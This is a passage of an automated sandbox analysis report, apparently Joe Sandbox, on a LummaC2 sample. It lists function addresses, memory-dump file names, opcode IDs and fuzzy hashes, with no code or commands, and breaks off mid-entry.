Instruction Fuzzy Hash: 8B2166326983505BE314CF659CC5B5BB7B2DBD1700F0AC43DA4D99B2C6C978C80A8756

Function 0048BC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 0048BC25, 0048BC55, 0048BC71

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 499543ccd991e0dafb6ecbae3b8509643fa89c965d38e8ed3f46fad509c1bd7b
Instruction ID: ab447ff31944ced21941c115fb684b025a30f0289c1ea3b2417ec4e0b0de0a67
Opcode Fuzzy Hash: 499543ccd991e0dafb6ecbae3b8509643fa89c965d38e8ed3f46fad509c1bd7b
Instruction Fuzzy Hash: 77F068206245554FEBE18F7C94593BF6BF0E726214F242DB9C64DE32E1DD1888814B0C

Function 0048D140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 284a730f7b9c3f8a3690bcd016a64ea35c0cd71bbfa1c8d9587e02d712f15ac3
Instruction ID: bb52d4f8dee257eb079065ebfabb1907bbd02dfbd09e20321dc4a9be69249470
Opcode Fuzzy Hash: 284a730f7b9c3f8a3690bcd016a64ea35c0cd71bbfa1c8d9587e02d712f15ac3
Instruction Fuzzy Hash: 0E22F331B18211CFC708CF28D89066AB7E2FF9A314F1A89BED885873A1D7359C55CB85

Function 0048D240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d5247e3779e84538758de3fb2b97ce16aa2369b0bdf308bcce9565f6d2237f
Instruction ID: bd38f2ee2f22b8b39bd7c41c6880b58fc4e22bf6dfb6f0d9290925df345dba6b
Opcode Fuzzy Hash: 61d5247e3779e84538758de3fb2b97ce16aa2369b0bdf308bcce9565f6d2237f
Instruction Fuzzy Hash: 6012E231B19211CFC708CF28D89066AB7E2FFDA314F1A89BED485973A1D6359C16CB85

Function 00452F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8857af6f12632079cb4a1dd56503b97fd0ea2f99ec381d28a16e0f383a68710
Instruction ID: d334ad0379560b01656fc2e6030825b28d21933cffedc2453f832af6db2b17f5
Opcode Fuzzy Hash: d8857af6f12632079cb4a1dd56503b97fd0ea2f99ec381d28a16e0f383a68710
Instruction Fuzzy Hash: 1752E3715083459FCB14CF28C0806AABBE1FF89356F18896EFC9957342D778E949CB89

Function 00456660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7f33500df6b7adf443adce13767be3f8af65d66163c5d49612c84b7c8fee73
Instruction ID: 5e6f6a21c5e3eb798dfbf562154081b72fdf54a54521470c83a9bc3894359e66
Opcode Fuzzy Hash: 8f7f33500df6b7adf443adce13767be3f8af65d66163c5d49612c84b7c8fee73
Instruction Fuzzy Hash: 0752B2B0908B848FE735CB24C4843A7BBE1AB51315F55882ED9EA07783C37DA98DC759

Function 00457440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: 7a8581f62d2decae4a6f13124257c3e63908ded86b4a3f2edd995c42cd2b40f9
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: B822B63160C7158BD7249F18E8406ABB3E2EFD431AF19493EDD8697382D738A819C746

Function 0048D320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7ead979abf098dad40b9568f04417428f10dadf9e6fce46b24d75a55a7f2cd
Instruction ID: 852258db33f8a0b63847e750837fbb1edbcf58f8a8a6a750408ae61fadf972eb
Opcode Fuzzy Hash: 3c7ead979abf098dad40b9568f04417428f10dadf9e6fce46b24d75a55a7f2cd
Instruction Fuzzy Hash: 2102D332B18211CFC718CF28D89066AB7E2FFDA314F1A89BED48597361D6359D15CB84

Function 00453960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748bfe64add16f5cecaf4d7c12e6ad487cce40c4c941f1480bf9afb99be3b5d1
Instruction ID: ac4223b8be27d25f0a72729e4c4721e6813961b913721b66454e550abc01ffd1
Opcode Fuzzy Hash: 748bfe64add16f5cecaf4d7c12e6ad487cce40c4c941f1480bf9afb99be3b5d1
Instruction Fuzzy Hash: 37323771514B108FC368CF29C58052AB7F1BF85752B604A2EDA9787F92D33AF949CB18

Function 0048D3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5513e68fed5dfd1db9d2547976fa951321a658cd5c4545e76e9e720bb2c60671
Instruction ID: 216cd426d1f837b29fdfefba3c6028106f3297661139f41637ffc15b87cf9e00
Opcode Fuzzy Hash: 5513e68fed5dfd1db9d2547976fa951321a658cd5c4545e76e9e720bb2c60671
Instruction Fuzzy Hash: 36F1D332A18211CFC718CF28D89066AB7E2FFDA314F1A89BED88597391D6359D11CB85

Function 0048D450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea56f0107dd87ba63e772277e8968d6c2aed6832c4bdc5643b1a5c8431ec175
Instruction ID: 9f09c687823b01da793c7b80e6ea503af2d753308c7dbbfa9192cde86979d49d
Opcode Fuzzy Hash: 3ea56f0107dd87ba63e772277e8968d6c2aed6832c4bdc5643b1a5c8431ec175
Instruction Fuzzy Hash: C9F1E732B19211CFC718CF28D89066AB7E2FFDA314F1A89BED88597391D6359D01CB85

Function 00487790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 339255725ab89a44e9602a218587e8b3be2b96c1e535020f86244de40f673045
Instruction ID: 90a4a8fd4ec10e895afba3f32ab86c86c04a0f9922081ed7b50b5ede503216c4
Opcode Fuzzy Hash: 339255725ab89a44e9602a218587e8b3be2b96c1e535020f86244de40f673045
Instruction Fuzzy Hash: B5E126726083108FD718EF24C8A166FB7A2EBC5308F298D2EE89597355D739EC06C795

Function 0047D110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0692b3852693c3cba21cd15e3cc1bcd4d89d57ab1ea37cb03288c7bb9a8bf57e
Instruction ID: 07d890840a38637f0e8ed567b3a572ecfa2cc0336a608d97bb075b72db0c362a
Opcode Fuzzy Hash: 0692b3852693c3cba21cd15e3cc1bcd4d89d57ab1ea37cb03288c7bb9a8bf57e
Instruction Fuzzy Hash: C522F6F0511B009FC7A5CF29C845A97BFE9EB89314F61896EE0AEC7310C7756901CB99

Function 004720C0 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c1042a804af93d44dd8c2759f673f35bf70f0be087467401f5fa17feee26a2
Instruction ID: 3205ee4cbfcc6d445a1ebbeb144a379ea8cb2156ca65e584f98d111492ae674f
Opcode Fuzzy Hash: f1c1042a804af93d44dd8c2759f673f35bf70f0be087467401f5fa17feee26a2
Instruction Fuzzy Hash: C3A12771A083109BD720DB25C9926BBB3E1EF91324F58C92EECC997342E77CD945835A

Function 00455970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: 7d9e6e2e784af9f622132a1ec65244ea2ed0dc5f180e4263c197ae6971353e49
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: 7BE16971108741CFC721DF29C890A6BFBE1EF99304F44882EE8D587752E679E948CB96

Function 00476230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b3ff7d55c43d346f64127881dc8d52fafb923a5fb51a50e63903e1904cad47e
Instruction ID: bbc6a04e1c719aeff3d1aff8be4dceeb1a49e4cbb117aa2e6892ed7862a05b5a
Opcode Fuzzy Hash: 1b3ff7d55c43d346f64127881dc8d52fafb923a5fb51a50e63903e1904cad47e
Instruction Fuzzy Hash: EDB14A715087114BD718CE24D8816BBB7E3EB95304F1AC96EE88A97382D639DC09C79A

Function 00471D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8087f9ddc23e50c6e3a483d03aff23d30376f4c64f784ddca18c6c1a58b3dc4e
Instruction ID: e70ef85fc1458af29a035524b08f748b2f4caff4a172f62bb369cb49b018693d
Opcode Fuzzy Hash: 8087f9ddc23e50c6e3a483d03aff23d30376f4c64f784ddca18c6c1a58b3dc4e
Instruction Fuzzy Hash: 8EA105716043018BD724DF28C892BA7B7A5EFC0364F18852DF9898B391E778D905C76A

Function 0046D840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f53f76e2ba3ca18d9c039072965b0e0b1f2b9901f0404bf276ef8dfc2df6b2
Instruction ID: ef9ba0a178d1bcb62f0068bb4e81b76d9d0e14817b7341510de2eb02884dbd7e
Opcode Fuzzy Hash: f7f53f76e2ba3ca18d9c039072965b0e0b1f2b9901f0404bf276ef8dfc2df6b2
Instruction Fuzzy Hash: 80B1F575E08301EFD7109F24CC41B2ABBE1AB98318F154A3EF4A4972A1E7759D49CB4A

Function 0048E1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3958257f40960013bab87646b8b227679df9d091f8e63112e3d2bc8994448f9e
Instruction ID: ea9bcd03e749a55ecbea62d5431ebfb1135f7b4e5de6461bb937ae78abd60ae4
Opcode Fuzzy Hash: 3958257f40960013bab87646b8b227679df9d091f8e63112e3d2bc8994448f9e
Instruction Fuzzy Hash: 9C91EF316082119BC724EF29D880A6FB3E2FFD9714F19892DE98587351DB38AC51CB86

Function 0047DFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc310876ebd27804102e5fd17862cd3a4cd19372986aa8e49bbea83c6cb6551f
Instruction ID: 68bebc76f416af305b74b204960257ae1d91c5a7b62dcd8ffb4fc8abce617643
Opcode Fuzzy Hash: fc310876ebd27804102e5fd17862cd3a4cd19372986aa8e49bbea83c6cb6551f
Instruction Fuzzy Hash: 2ED1F172608B804BD319CA3988913ABBFD29FD6324F19CA7DD5EB873C6D578A405C702

Function 0048DEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f304912a4277591d3df5cba177fa25accce7a36666f9716932b154ae35ffbde
Instruction ID: 118bf528b2b40436eadf45a6e15fdae3ca1d8d89b28daff015f6f2662aa1c449
Opcode Fuzzy Hash: 1f304912a4277591d3df5cba177fa25accce7a36666f9716932b154ae35ffbde
Instruction Fuzzy Hash: 329102356042118FD718EF19C890A2FB3E2EFD9710F15886EE9858B365DB34EC11DB8A

Function 004561D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: 09510ccac17af796dadeec5f61ca7a18f67ff6df356d636f03aeaf9eb1378cd0
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: FBC16CB29487418FC360CF28DC867ABB7E1BF85318F49492DD5D9C7242E778A159CB06

Function 00478C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849744c42a16ffb85bd429e80754b34ede3ef101fe681c5b95617c68f6c70a68
Instruction ID: 54070256e5792183626cedca985f201171f5738d3d6287dbb756146509bed6a3
Opcode Fuzzy Hash: 849744c42a16ffb85bd429e80754b34ede3ef101fe681c5b95617c68f6c70a68
Instruction Fuzzy Hash: 74A103B05083408FD724CF69D89269BB7F1EF95304F14892EF5998B392E779D805CB8A

Function 0048DBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 875264dfc931a2fa455465272561c574d9cbdccec64d013bfd711a17f671b072
Instruction ID: f78e310bd4617c736590a0b27625425eaad418fbc8d805c7c21a77c6f4a804ec
